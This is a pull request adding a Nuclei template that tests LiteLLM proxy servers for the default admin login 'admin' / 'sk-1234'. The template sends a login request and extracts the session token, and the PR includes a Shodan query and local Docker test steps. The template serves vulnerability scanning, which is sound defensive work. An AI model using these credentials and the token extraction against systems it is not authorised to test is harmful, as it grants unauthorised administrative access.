### PR TITLE
Creating litellm-default-login.yaml

### DIFF
--- a/http/default-logins/litellm-default-login.yaml
+++ b/http/default-logins/litellm-default-login.yaml
@@ -1,7 +1,7 @@
 id: litellm-default-login
 
 info:
-  name: LiteLLM - Default Credentials
+  name: LiteLLM - Default Login
   author: icarot
   severity: high
   description: |
@@ -13,6 +13,10 @@ info:
     shodan-query: http.html:"LiteLLM"
   tags: litellm,default-login,misconfig
 
+variables:
+  username: admin
+  password: sk-1234
+
 http:
   - raw:
       - |
@@ -21,13 +25,6 @@ http:
         Content-Type: application/json
 
         {"username":"{{username}}","password":"{{password}}"}
-
-    attack: pitchfork
-    payloads:
-      username:
-        - admin
-      password:
-        - sk-1234
 
     matchers-condition: and
     matchers:
@@ -46,6 +43,7 @@ http:
       - type: status
         status:
           - 200
+
     extractors:
       - type: json
         name: token

--- a/http/default-logins/litellm-default-login.yaml
+++ b/http/default-logins/litellm-default-login.yaml
@@ -1,0 +1,53 @@
+id: litellm-default-login
+
+info:
+  name: LiteLLM - Default Credentials
+  author: icarot
+  severity: high
+  description: |
+    LiteLLM enables default admin credential. An attacker can execute unauthorized operations.
+  reference:
+    - https://github.com/BerriAI/litellm
+  metadata:
+    max-request: 1
+    shodan-query: http.html:"LiteLLM"
+  tags: litellm,default-login,misconfig
+
+http:
+  - raw:
+      - |
+        POST /v2/login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"username":"{{username}}","password":"{{password}}"}
+
+    attack: pitchfork
+    payloads:
+      username:
+        - admin
+      password:
+        - sk-1234
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"redirect_url":'
+          - '"token":'
+        condition: and
+
+      - type: word
+        part: content_type
+        words:
+          - 'application/json'
+
+      - type: status
+        status:
+          - 200
+    extractors:
+      - type: json
+        name: token
+        json:
+          - '.token'


### PR DESCRIPTION
This nuclei template:

* LiteLLM enables default admin credential. An attacker can execute unauthorized operations.

- References:

https://github.com/BerriAI/litellm
https://docs.litellm.ai/docs/proxy/docker_quick_start

I've validated this template locally?
- [x] YES
- [ ] NO

**Steps to test:**

**LiteLLM Docker Compose:**

1. Running container:

```
$ curl -sSLO https://docs.litellm.ai/docker-compose.yml
$ docker compose up -d
$ docker inspect -f '{{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}}' litellm-litellm-1
```

**Nuclei execution:**

`$ ~/go/bin/nuclei -t litellm-default-login.yaml -u "http://<host_machine_IP_address>:4000/" -H "User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36"`

<img width="1845" height="370" alt="image" src="https://github.com/user-attachments/assets/b3ef1f07-839f-42fc-b19d-a349083b4155" />
